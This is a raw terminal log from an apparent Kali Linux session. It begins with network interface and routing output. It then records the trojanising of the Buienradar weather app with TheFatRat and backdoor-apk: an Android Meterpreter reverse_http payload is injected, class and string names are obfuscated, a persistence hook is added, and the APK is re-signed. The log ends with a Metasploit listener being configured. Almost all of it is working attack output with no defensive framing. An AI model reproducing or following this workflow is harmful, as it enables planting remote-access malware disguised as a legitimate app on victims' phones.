eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
        inet 192.168.100.238 netmask 255.255.255.0 broadcast 192.168.100.255
        inet6 fe80::20c:29ff:fe7e:b94e prefixlen 64 scopeid 0x20<link>
        ether 00:0c:29:7e:b9:4e txqueuelen 1000 (Ethernet)
        RX packets 4825 bytes 2941520 (2.8 MiB)
        RX errors 0 dropped 0 overruns 0 frame 0
        TX packets 5780 bytes 891394 (870.5 KiB)
        TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
        inet 127.0.0.1 netmask 255.0.0.0
        inet6 ::1 prefixlen 128 scopeid 0x10<host>
        loop txqueuelen 1000 (Local Loopback)
        RX packets 1004 bytes 106816 (104.3 KiB)
        RX errors 0 dropped 0 overruns 0 frame 0
        TX packets 1004 bytes 106816 (104.3 KiB)
        TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500
        inet 10.8.0.2 netmask 255.255.0.0 destination 10.8.0.2
        inet6 fdda:d0d0:cafe:1194::1000 prefixlen 64 scopeid 0x0<global>
        inet6 fe80::44b1:5bb1:12d2:e76e prefixlen 64 scopeid 0x20<link>
        unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 500 (UNSPEC)
        RX packets 3229 bytes 1507100 (1.4 MiB)
        RX errors 0 dropped 0 overruns 0 frame 0
        TX packets 4378 bytes 445050 (434.6 KiB)
        TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 2312
        inet 192.168.100.106 netmask 255.255.255.0 broadcast 192.168.100.255
        inet6 fe80::7bae:4f96:fdb:22b9 prefixlen 64 scopeid 0x20<link>
        ether 00:13:ef:f4:00:60 txqueuelen 1000 (Ethernet)
        RX packets 292 bytes 173648 (169.5 KiB)
        RX errors 0 dropped 0 overruns 0 frame 0
        TX packets 18 bytes 2738 (2.6 KiB)
        TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
root@kali:~# route -n
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
0.0.0.0         10.8.0.1        128.0.0.0       UG    0      0        0 tun0
0.0.0.0         192.168.100.1   0.0.0.0         UG    100    0        0 eth0
0.0.0.0         192.168.100.1   0.0.0.0         UG    600    0        0 wlan0
10.8.0.0        0.0.0.0         255.255.0.0     U     0      0        0 tun0
128.0.0.0       10.8.0.1        128.0.0.0       UG    0      0        0 tun0
185.213.154.134 192.168.100.1   255.255.255.255 UGH   0      0        0 eth0
192.168.100.0   0.0.0.0         255.255.255.0   U     100    0        0 eth0
192.168.100.0   0.0.0.0         255.255.255.0   U     600    0        0 wlan0
root@kali:~#
IP device: 192.168.100.129
[ ]===========================================================================[ ]
[ ] Embed a Metasploit Payload in an original .apk files [ ]
[ ] This script is POC for injecting metasploit payload arbitary apk backdoor [ ]
[ ]===========================================================================[ ]
Cleaning Temp files
Done!
Your local IPV4 address is : 192.168.100.106
Your local IPV6 address is : fe80::7bae:4f96:fdb:22b9
Your public IP address is :
Your Hostname is :
Set LHOST IP: 192.168.100.106
Set LPORT: 8080
Enter the path to your android app/game .(ex: /root/downloads/myapp.apk)
Path : /root/Downloads/buienradar.apk
Testing your apk before next step …
+-------------------------------------------+
| [ 1 ] android/meterpreter/reverse_http    |
| [ 2 ] android/meterpreter/reverse_https   |
| [ 3 ] android/meterpreter/reverse_tcp     |
| [ 4 ] android/shell/reverse_http          |
| [ 5 ] android/shell/reverse_https         |
| [ 6 ] android/shell/reverse_tcp           |
+-------------------------------------------+
Choose Payload : 1
[ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ]
+-------------------------------------+
| [ 1 ] Use Backdoor-apk 0.2.4a       |
| [ 2 ] Use old Fatrat method         |
| [ 3 ] Use MsfVenom Embedded method  |
+-------------------------------------+
Select Tool to create apk : 1
[ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ]$
Generate Backdoor
+------------++-------------------------++-----------------------+
| Name       || Descript                || Your Input
+------------++-------------------------++-----------------------+
| LHOST      || The Listen Addres       || 192.168.100.106
| LPORT      || The Listen Ports        || 8080
| OUTPUTNAME || The Filename output     || app_backdoor.apk
| PAYLOAD    || Payload To Be Used      || android/meterpreter/reverse_http
+------------++-------------------------++-----------------------+
Dana James Traversie
[*] Running backdoor-apk.sh v0.2.4a on Thu Jul 6 07:29:27 AM EDT 2023
[+] Android manifest permission options:
1) Keep original
2) Merge with payload and shuffle
[?] Please select an Android manifest permission option: 2
[*] Decompiling original APK file…done.
[*] Locating smali file to hook in original project…done.
[+] Package where RAT smali files will be injected: com/supportware/Buienradar
[+] Smali file to hook RAT payload: nl/rtl/buienradar/BuienradarApplication.smali
[*] Generating RAT APK file…done.
[*] Decompiling RAT APK file…done.
[*] Merging permissions of original and payload projects…done.
[*] Injecting helpful Java classes in RAT APK file…done.
[*] Creating new directory in original package for RAT smali files…done.
[+] Inject package path: com/supportware/Buienradar/anvzv
[+] Generated new smali class name for MainBroadcastReceiver.smali: Xoodj
[+] Generated new smali class name for MainService.smali: Omede
[+] Generated new smali class name for Payload.smali: Xiqlw
[+] Generated new smali class name for StringObfuscator.smali: Mvtrc
[+] Generated new smali method name for StringObfuscator.obfuscate method: ludhu
[+] Generated new smali method name for StringObfuscator.unobfuscate method: wgycs
[*] Copying RAT smali files to new directories in original project…done.
[*] Fixing RAT smali files…done.
[*] Obfuscating const-string values in RAT smali files…Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
done.
[*] Adding hook in original smali file…done.
[*] Adding persistence hook in original project…done.
[*] Recompiling original project with backdoor…done.
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Warning:
The certificate uses the SHA1withRSA signature algorithm which is considered a security risk. This algorithm will be disabled in a future update.
The certificate uses a 1024-bit RSA key which is considered a security risk. This key size will be disabled in a future update.
[*] Generating RSA key for signing…done.
[*] Signing recompiled APK…done.
[*] Verifying signed artifacts…done.
[*] Aligning recompiled APK…done.
[*] Backdoor apk created succefully
Your RAT apk was successfully builded and signed , it is located here :
~/Fatrat_Generated/app_backdoor.apk
Do you want to create a listener for this configuration
to use in msfconsole in future ?
Choose y/n :
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------
Payload options (android/meterpreter/reverse_http):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.100.106  yes       The local listener hostname
   LPORT  8080             yes       The local listener port
   LURI                    no        The HTTP Path
Exploit target:
   Id  Name
   --  ----
   0   Wildcard Target
msf6 exploit(multi/handler) >